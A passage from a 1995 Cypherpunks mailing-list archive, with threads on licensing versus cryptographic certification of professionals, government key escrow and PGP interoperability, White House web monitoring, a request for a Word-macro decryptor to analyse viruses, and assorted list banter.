witholding it, or it is worth something, and thus to be non-coercive they 
must give it to anyone who asks, rendering their signatures worthless.

This is the trap of the licensing argument.

The evil is not licensing, which I think serves a real purpose, but 
created convenience fees, taxation through the withholding of licensing 
and the use of other government largess.   I wrote a massive piece on this 
and sent it to the list about a year and a half ago.  With interest I will 
repost it.

The real question is how you decide what an authority to license is.  Is 
it to be dictated by government?  Or by market forces (i.e. the 
reputation of the licenser).


> 
> >I don't see how the net will eliminate the basic need for highly
> >qualified professionals and the proof that they have credentials.
> 
>      It won't.  The needs might shift a little but they
>      will be there.

Then why will lawyers, or a 'professional monopoly' be broken?

> >Perhaps diplomas and such will be transfered into digital signatures for
> >the institutions, but I can't see how this "cracks" any "monopoly."
> >Perhaps the monopoly is shifted to those who have diplomas, rather than
> >those "licensed to practice" but so what?
> 
>      It might "crack" government enforced monopoly.

Now you are getting more specific.

>      Should a market monopoly survive some form of
>      crypto-anarchy it would be in the form of a
>      certification entity that does such a good and
>      efficient job that it is very hard to break
>      into the business.

Agreed.  Again, what does this do to lawyers?  See my above comments on 
what constitutes a license.

>      Not so bad if it happens,
>      but much more honest, efficient and softer-edged
>      than "licensed to practice".

I'm not so sure.  There will be a tremendous amount of corporate power in 
these authorities, and if (as you seem to be saying a few paragraphs up) it 
is hard to break into the trusted certification business, there is a 
monopoly again.

>      I suspect that
>      people have needs for varying levels and varying
>      specializations so that several kinds of
>      certifications may develop and might be supplied
>      by multiple entities.

Like the several state Bars?

Hint: An attorney licensed in Deleware has a much different speciality 
likely than one licensed in Alabama.

>      I suspect that many people would want a
>      certification that a lawyer meets the usual
>      licensing requirements of the outside world.
>      Who knows, maybe that would be the most popular kind.
>      But it won't be the only kind.

So you have estentially admitted that a central authority is required?  
Or will be more often used?

So is this a license or what?  Looks like one to me.

If your defintion of license is simply who does the coercing, I think you 
should reconsider.

> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 18:55:35 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Key Escrow as Law Enforcement's *Worst Nightmare*
In-Reply-To: <ac7b412911021004bdd2@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950913205344.29344C-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Darn.  I always thought it came from "The Monkey's Paw."

MacN

On Tue, 12 Sep 1995, Timothy C. May wrote:

> 
> "Be careful what you ask for--you might get it." (Albanian Proverb)
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Wed, 13 Sep 95 18:15:04 PDT
To: cypherpunks@toad.com
Subject: MS-Word macros disassembler/cracker?
Message-ID: <Pine.3.89.9509132130.E18266-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



This was on the Info-Sec mailing list and appears to be a request for 
help in cracking some sort of execute-only wrappers on MicroSoft 
Word-for-Windows macros, the concern being that the macros need to be 
defused if they're malignant.  If anybody wants to, they may respond right 
to: njb@csehost.knoware.nl <Niels J. Bjergstrom>.

. . . .

>All the macros are made ExecuteOnly, meaning that they are compiled or
>encrypted so that the Word macro interpretor can execute them, but they
>cannot be listed or edited. Does anyone reading this list happen to know
>where we can find a cracker or disassembler for ExecuteOnly Word macros? It
>is of vital importance that we are able to read malignant Word macros, and
>any help will be appreciated.

. . . .

>macro vira to us at the email address below. And I repeat: We are very
>interested in obtaining a cracker for the Word macro language
>encryptor/compiler. We haven't looked at this yet. For all we know it could
>be very simple, but any info is appreciated.
>
>Niels
>
>-- Niels J Bjergstrom, Ph.D., m/ISACA            Tel. +31 70 362 2269 --
>-- Computer Security Engineers, Ltd.             Fax. +31 70 365 2286 --
>-- Postbus 85 502, NL-2508 CE Den Haag       London: +44 181 519 8011 --
>-- Netherlands                          Email: njb@csehost.knoware.nl --
>-- PGP Public key available on request - please use when mailing vira --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 13 Sep 95 18:20:40 PDT
To: don@cs.byu.edu
Subject: Re: Factoring Software (fwd)
In-Reply-To: <199509140039.SAA00376@wero.byu.edu>
Message-ID: <199509140120.VAA05979@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Just saw this on Usenet, was wondering who knows this guy. Obviously not
> a cpunk or it would have hit the list right away. Not in the mood to run
> code on my account without knowing that I know what it will do.

Gee, Bob moved -- I wonder how long he's been at MathWorks...
Anyways, Bob Silverman is a known Factoring Guy (TM).  He's been
involved in network factoring for a long time.

The software he is distributing, MPQS, is the algorithm that was used
to factor rsa-129.  Although this is probably not the same
implementation that we used then, it probably is pretty much the same.

I've met Bob; he is not a tentacle. ;-)

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 19:31:38 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509131926.PAA14458@panix.com>
Message-ID: <Pine.SOL.3.91.950913212637.29344J-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


I don't know about national characteristics.  After all,
"What's in a name?  Would a rose by any other name..."
and so on.

Cypherpunk fits.  Cypherpunk suits.  So, if the
suit fits...

MacN

On Wed, 13 Sep 1995, Duncan Frissell wrote:

> At 10:57 AM 9/13/95 -0700, Timothy C. May wrote:
> 
> >While I have had some qualms about the name, on balance I think it has been
> >good for us. After all, it's not as if _other_ groups don't already exist!
> >In particular, the British branch of Cypherpunks disliked the name
> >"Cypherpunks" so much that they used a different name for themselves, the
> >"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for
> >whatever reasons. But the name may have been a factor, at least.
> 
> Note too that Brits differ from Americans.  "Wired" worked well here from
> the beginning but has had problems there.  Differing national characteristics.
> 
> DCF
> 
> "Let's all just agree to disagree.  My system can thrive with widespread
> disagreement among rabid individualists --- can yours?"
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 13 Sep 95 20:05:59 PDT
To: Patrick Horgan <patrick@Verity.COM>
Subject: Re: Digital Fingerprinting
In-Reply-To: <9509131457.AA17323@cantina.verity.com>
Message-ID: <Pine.SOL.3.91.950913220454.844D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Patrick Horgan wrote:

> > 
> > > Then, in W.Ky., as in Stockbridge, "You can get
> > > anything you want..."? :)
> > 
> > I'd stick with:
> > ***********************************************
> > You can't always get what you want            1
> > but if you try
> > sometimes, sometimes you get what you need.   2
> > ***********************************************
> > 
> > 1 ability to dump garbage where you want
> > 2 a better appreciation for the environment
> > :-)
> 
> 
> Why do I feel like I'm sitting on the group W bench?

I don't know, kid, what you in for?

MacN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 13 Sep 95 19:22:33 PDT
To: cme@tis.com
Subject: Re: Can GAK be made "not interoperable" with PGP?
Message-ID: <80481.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Duncan Frissell <frissell@panix.com>  writes:
> Timothy C. May wrote:
>>But is this even possible, to make a GAK system "not interoperable" with,
>>  say, PGP?
>>   Unless the GAK system has some sort of entropy analyzer, and can
>>  recognize high-entropy sources which it presumes to be encrypted data
>>  (*), one can of course PGP-encrypt a text file and then GAK the
>> resulting file.
>
> I took it to mean that they were saying that an approved program on one
> end of a communication exchange could not exchange encrypted messages or
> established an encrypted session of some kind with an un approved program
> on the other end.  Not trying to outlaw superencryption (PGP on both ends
> using a GAKed channel) but GAK on one end working with an unapproved
> system on the other end.  A ringer GAK-work-alike that would defeat the
> intent of GAK.
> I don't know if the government can prevent that with a software-only
> system or indeed if half a secure system can be made completely secure.

The breakout session that I was in was directly charged with this issue.
We talked at length about it. There were NIS&T and NSA folks at the session.
The consensus was that the Government wanted to prevent a version of PGP
that was export enabled (GAK and short keys) that would be backward
compatible.

The group stated strongly that this was a "non starter." That is,
it was unacceptable. Vendors wanted "sales appeal." That means
compatibility with existing software. And compatibility with existing
export-approved systems. [DES has been exported to "friendly" countries
with strict controls.]

And criteria #2 specifically outlawed superencryption.
No DES | TRAN | DES | TRAN | DES.
They were serious. talk to CME, he was in that session.

I believe that this criteria is stupid, or at least ill-advised.
But the govies insisted.

All the more justification to ignore the US rules and develop
off-shore.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 13 Sep 95 21:26:13 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510104ac7d40ec670b@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
>On Wed, 13 Sep 1995, Dar Scott wrote:
>
>> Black Unicorn wrote,
[snip}

We seem to be having problems with the meanings of words.  For example, I
make a distinction between certification and licensing.  Also, I see
violence and coercion as being ultimately related to something physical.
I'm not sure what "proper", "competent to practice"... mean.  And I see a
big difference in a market based monopoly and a government based monopoly.


[snip]
>Didn't I just say this above?
>
>A centralized, or several centralized authorities.

I had assumed you meant by authority an agent of the state that is able to
envoke or otherwise wield the physical force of the state.  By a certifying
entities I was refering to private organizations that had no similar power
or to government organizations that had only the power to provide
information.

By a licensing entity I was refering to an organization that can coerce to
prevent the unlicensed from doing the licensed behavior.  By coercion I
meant the threat of physical force or the force itself.  Though one might
think of physical force as applying to murder, kidnapping, slavery,
assault, robbery, physical theft, I would also apply it to theft or damage
of abstract property that has properties like physical property.  I intend
for these to apply to many actions of the state.

Perhaps I erred in applying "certification" and "license" to these
contrasting concepts, but I do think the distinction is important and the
observation that there are fuzzy areas in between does not remove that.

If I have a license from the local gang to sell drugs and the guy across
the street does not, I could encourage the gang to do something and the guy
might get shot.  Similarly, if I was a PE and my competitor across the
street was not, I could encourage the state to do something that--with
several stages of his lack of cooperation--results in his finding a gun in
his face or worse.

>I guess the center of my question is, how can you apply Web of Trust to
>e.g. a university degree.  Who cares what Bob and Alice think my degree
>is in, the client only wants to know from the institution.

It does not matter why people would trust a certifying entity.  It might
have a great earned reputation, it might "borrow" some reputation from
bonding or audits, or it might have ties to the Real World.

>  Licensing can only be done by an
>>      entity that can use physical force to prevent
>>      buying and selling legal services.
>
>I believe you are incorrect, but I guess my main concern is your
>characterization of "Physical force."  I am assuming you mean coercion,
>and not that you will be jailed or such (though this may be the case).
>
>I would argue that as long as coercion exists (violence of any type,
>physical or not) you have a licensing authority.  Take the hollywood
>blacklist.  No one actually pushed around suspected pinko screenwriters
>(well, at least, if anyone did, it was incendential) but they certainly
>faced a great deal of persuasive motivation.  Look at the committee as
>the licensing authority here.  (Licensing you as a non-communist as it were).

It seems I am using coercion in a different sense.  Unless blacklisting has
physical force at its root enforcement mechanism it is not coercion and is
very fragile.

>If several governmental and private authorities were in the practice of
>certifing that Bob has a law degree from Tremont University, and that he
>is competent to practice in D.C., and given that the citizens of D.C.
>will look for these credentials, isn't this a license?  Afterall, Bob has
>to pass some test or requirement to get the signatures.  Isn't this
>coercion in your definition?

No.  I apologize for any confusion.

>Can't the multiple authorities set common
>or near common guidelines?  Rather, don't they HAVE to in order to have
>their signatures worth the electrons they are transmitted with?

In general, No.  Under many conditions market forces make services alike,
but more often competing businesses find particular market niches.  I would
expect that different certs would cover different levels of expertise,
different specializations and different breadths of specializations.  Any
lawyer might have a dozen certs.  I would not expect there to be a single
level of certification for all applications.  I know of several companies
in which the primary product designer has no engineering degree.

>If you take the exteme position you seem to, there's an antitrust case here.
I don't insist there has to be a variety.  I only desire that coercion does
not come into play in preventing it.  As I said, if a natural monopoly
forms at times, I am not worried.

>Am I not "licensing" my key signature to people provided they pass my key
>signature criteria?  Am I not doing violence by withholding my signature
>and the benefits it might convey for certain "terms?"
[snip]
>This is the trap of the licensing argument.

I see a big difference in withholding a signature and sending gunmen.
There is no violence in withholding a signature.

>The evil is not licensing, which I think serves a real purpose, but
>created convenience fees, taxation through the withholding of licensing
>and the use of other government largess.   I wrote a massive piece on this
>and sent it to the list about a year and a half ago.  With interest I will
>repost it.

Even if no one else is interested, I'd like to see it.

>The real question is how you decide what an authority to license is.  Is
>it to be dictated by government?  Or by market forces (i.e. the
>reputation of the licenser).

Yes, the government vs. market question is key, but I believe the answer is
in that distinction I used in contrasting terms "certification" and
"license".  The "who" is tied up in what the instrument is.

>> >I don't see how the net will eliminate the basic need for highly
>> >qualified professionals and the proof that they have credentials.
>>
>>      It won't.  The needs might shift a little but they
>>      will be there.
>
>Then why will lawyers, or a 'professional monopoly' be broken?
The meaning of "qualified professional" and "credentials" will be
market-based and multidimensional, not defined by the state or a group
already "qualified" using the state for enforcement.

[snip]
Concerning a market-based monopoly,
>>      Not so bad if it happens,
>>      but much more honest, efficient and softer-edged
>>      than "licensed to practice".
>
>I'm not so sure.  There will be a tremendous amount of corporate power in
>these authorities, and if (as you seem to be saying a few paragraphs up) it
>is hard to break into the trusted certification business, there is a
>monopoly again.
I don't really think this is a problem.  It is the force-based monopoly and
specifically the government-based monopoly I have a problem with.

[snip]
>Like the several state Bars?
The market advantage is slight.

[snip]
>So you have estentially admitted that a central authority is required?
>Or will be more often used?
Not required.

[snip]
>If your defintion of license is simply who does the coercing, I think you
>should reconsider.

What ever the word used, I see the distinction between 1) the assertion of
certain information and 2) the threat of force as being key.

Perhaps, I could have use the phrases "non-coercion-based" licensing and
"coercion-based" licensing, but I am not comfortable with these--trade
licensing invokes too violent of an image.

A note to all in government licensed trades:  I recognize that licensing is
part of the real world we live in.  Often one has to be licensed to
practice a favorite trade.  I do not mean to describe the licensed
themselves as violent.

Dar


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 14 Sep 95 17:28:55 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <199509140335.UAA13203@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>> Why do I feel like I'm sitting on the group W bench?
>
>I don't know, kid, what you in for?
MacN

I said, "Velveeta," and they all moved away. "And, using a
PGP signed message, through a chained MIXMASTER remailer to
help Phil Z.," and they all came back, and we was talking about
packet-sniffing, reputation markets, key cracking, ITAR, 
IP spoofing, Diffee-Hellman session keys, RC4, MD5, and all
those wonderful things right there on the group W bench...

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 13 Sep 95 21:28:40 PDT
To: cypherpunks@toad.com
Subject: (NOISE) Re: White House M
In-Reply-To: <8B1023A.000504FC46.uuout@the-matrix.com>
Message-ID: <8B10562.000504FFB4.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



 |>         Maybe so, but we don't have to like it.  And I don't.  But
 |>         it's not so much their access, per se, that I object to.
F|Why the hell do you care ?  Someone has a home page for something on the Web.
 |Someone at the White House looks at it. So what ?  You object to the fact
 |that somebody in the government has a Web browser and *gasp* uses it to read
 |stuff on the WWW ???

        What did I just write?  It's not so much their access...

 |> It's their potential intentions,
F|You take moral offense to what you think someone else _might_ be thinking ?

        Not normally, no.  But I've found a number of reasons to take
        offense at more overt government actions, and I see no reason
        not to take offense at obscure government actions.

        Especially when it involves spooks (NSA, DOD, military branch
        agencies, CIA, FBI, DEA, alphabet soup agency of choice).

 |Sounds like you believe in thoughtcrime. Banned any good books lately ?

        I _DO_ believe in thoughtcrime.  I think it's a goddamned crime
        when some dickhead with more power than sense attempts to limit
        the actions of private citizens, in complete disregard for the
        idea of "presumed innocent until proven guilty."  If someone so
        much as THINKS this, I have a problem with them.

        Now, go fuck yourself.

F|>  all things considered, and
 |>         the fact that they aren't at all open about such monitoring.
F|This is absurd. You expect the White House to issue a press release every tim
 |a staffer clicks on a URL ?

        No.  I want to know what they're monitoring on a general
        basis and why.  It's my tax money, too.  But they aren't
        open about the monitoring.  Half the time they deny doing
        it at all, and the rest of the time they come up with a
        few dozen specious excuses.


        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Sep 95 20:52:48 PDT
To: cme@acm.org
Subject: Re: CAGK rationale (was: Re: GAK/weak crypto rationale?)
In-Reply-To: <9509132212.AA28200@tis.com>
Message-ID: <Pine.D-G.3.91.950913230550.5486E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995 cme@acm.org wrote:

> >Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT)
> >From: Brian Davis <bdavis@thepoint.net>
> 
> >  In our district, we 
> >managed to convict almost 20 people in an investigation of the state 
> >legislature, including the now-former Speaker of the House and > 6 other 
> >legislators.  Bribing lobbyists took hits, etc.
> >
> >Particularly effective were the court-approved video and audio tapes of 
> >the Speaker taking a bribe in exchange for certain action on legislation 
> >and responding to the bribing party:   "Well bless your heart."
> >That has become the office's mantra.
> 
> Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with
> all gov't officials forced to use keys held by various newspapers and
> other watchdog agencies....
> 
> The video and audio bugs aren't part of the wiretap process so they don't
> apply here.
>

You need to reread Title III.  The same law applies.  And when encryption 
defeats all wiretaps, there will likely be more  "interceptions of oral 
communications."  That is, bugs.  And that's something I hadn't thought 
of until just now.

EBD


 
>  - Carl
> 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +----------------------------------------------------------- Jean Ellison -+
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 13 Sep 95 21:16:44 PDT
To: cypherpunks@toad.com
Subject: Need ideas. NFP to monitor law enforcement on the net.
Message-ID: <v01510103ac7d68d0b158@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear cpunks,

after reading several articles about government sting operations in the US
and Bavaria, I'm thinking of starting a not for profit to collect and
diseminate information on law enforcement on the net. I know how to register
a NFP Corp, and certainly know about mailing lists and web pages, but other
problems still remain to be solved. Specifically:

1) Is it better to be a national or state registered NFP? (Given the level
of LEA hassling I might experience.)

2) What if I start a mailing list and nobody shows up? Whose participation
should I ensure so that the effort is a success.

3) What are some good sources of information for LEA's on the net?

Any suggestions would be most welcome.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFe6MnIf3YegbdiBAQHmeAJYz4bKtqPJvcdyUxcuVEOVgAYNO3sRuUzW
lnYnq7o2qBMcePAW8xTVECmwt8DXTbutSTJC10DBHdyjDGdgdwwN3ne0mCWN7Pig
uDUk
=W0pp
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 14 Sep 95 19:29:27 PDT
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509130156.LAA29400@molly.cs.monash.edu.au>
Message-ID: <Pine.BSD.3.91.950913234317.9083H-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Jiri Baum wrote:
> 
> I feel I should point out that you have no proof that the text you have
> attributed to me was in fact posted by me, and in fact you have reason
> to believe otherwise since I usually PGP-sign my entire post including
> any signature.
> 

Wasn't a flame my friend.....wasn't meant as one either.

> Off topic, but I have been publicly accused so I feel I should publicly
> respond in the same forum.
> 

no problem :-^)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 13 Sep 95 21:10:20 PDT
To: cypherpunks@toad.com
Subject: [Meeting at Tim's house participant] Who wanted the AT&T UNIX for 8086/80286 ?
Message-ID: <199509140407.AAA12906@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would the person who expressed interest in my collection of genuine AT&T
UNIX for the AT&T 6300 (an 8086) and 6300 Plus (an 80286) complete with
several shelf feet hard cover doccumentation  as well as the developer kit
please get in touch with me?

As for the rest of you: you may stop laughing now ;-)

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFeqlyoZzwIn1bdtAQEkswF/dxu8jYNFjLVRK+3SbNy9ee2fc4xzsro6
elH7VHUX85Y/23EQmL0wBoVkAyqHKk0Z
=uYSW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 13 Sep 95 22:17:21 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <9509140517.AA01328@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I know a few folks at eop, and I can tell you that
it's a tad bigger setup that a few boxes in bill's
private office.

This is the "office" of the executive, not "the executive office".
There's a good amount of people who work there. Most of them
are good folks too. They are not power hungry nuts, they are not
bad clones of "The Monroes", they are not weirdos like "Cancer Man"
out of the X-Files, in fact, in many cases they are just real normal
people who belive in trying to do something for their fellow citizens.
They don't *do* partisan politics, and in fact, partisan politics
are the greatest source of fear for their job security.

I've watched allot of *good* people, by ANYONES standards,
leave their jobs in the government lately due to the lack of
support they have gotten from the congress & the executive branch,
and I know how bad morale is in places where everyone would
be better served if people didn't have to worry about how
to feed the kids next month.

Don't get me wrong, I don't agree with allot of *political*
stuff that's going on at all. But the idea of some poor sod
worrying about his job becasue he decided to check out a
web site with "controversial" material is enough to make
me vomit.

Attributing a conspiracy to this is just plain and simple
ignorance. Any agency worth much wouldn't "monitor" from
a site with a big 'ol .gov at the end of the IP. THEY arn't
that stupid, but apperently the whackos in the woodpile
think that people would be that dumb.

Personaly I'd be flattered if some gov site were looking at
"dissident" material I put up, if I chose to do that, God knows
it might actually mean my elected representatives were listening,
or at least their staff might be.

I swear, Clinton "scandals" make me nostalgic for the 'ol
republican days when we had REAL scandals like Watergate
& Iran-Contra... All this Foster crap & black helicopters
just strikes me as goofy, and in some cases ignorantly
obnoxious. I guess this is what happens when the trailer park
crowd get's on the net...


Tim



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 13 Sep 95 23:36:59 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509140636.BAA08330@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>It has occurred to me with the approach of the presidential campaign
>in the US (and its attendant press frenzy), that there is an an
>unprecedentedly vast opportunity to bring certain items on the
>cypherpunk platform into the public spotlight.
[...]
>     Candidate Posturing                    Required Spin
>     -----------------------------------------------------------------
>     Pro-business, tough on crime           anonymous crime tip e-mail
>                                            a la Fed whistleblower stuff,
>                                            and the SPA
[...]

Now that you mention it, it seems to me that completely anonymous tipsters
with the ability to receive ecash rewards would likely be a bigger boon to
law enforcement types than would easily tappable communications lines.  
Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
use through the remailers)?  You could set up a web-page with instructions
and a list of crimes for which there are rewards.  Perhaps some civic
organiztions would be willing to donate money for tips leading to arrests
and convictions of any crimes.  Even if it doesn't catch any bad guys, it'd be
great PR for strong crypto, anonymity, ecash and whoever runs it.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 17:54:47 PDT
To: cypherpunks@toad.com
Subject: RE: AN OPPORTUNITY NOT TO BE MISSED
Message-ID: <9509201551146661@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 13 Sep 1995 19:25:24 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Re: An opportunity not to be missed

At 1:57 AM 9/14/95, Bill Stewart wrote:

>Is Wavy Gravy running his "Nobody for President" campaign again this time?
>After all, Nobody's going to balance the budget, and Nobody's going to
>get the government out of your bedroom, and on the internet, Nobody can tell
>if you're a dog or not :-)

Or to update it for today:

"Nobody@remailer.org for President."


--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 02:26:05 PDT
To: cypherpunks@toad.com
Subject: AOL Porno
Message-ID: <Pine.SUN.3.91.950914051946.8806B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Will the federal prosecutors and Fibbies on this list please 
emphasize that the Internet was not involved in the AOL kiddie porn 
case.  The Internet has enough opportunities for bad publicity as 
it is.

DCF

"Who wonders:  How it is that CompuServe was able to exist from 1979 
to the arrival of Prodigy and AOL without major sex, and drugs, and 
rock and roll problems?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 04:57:54 PDT
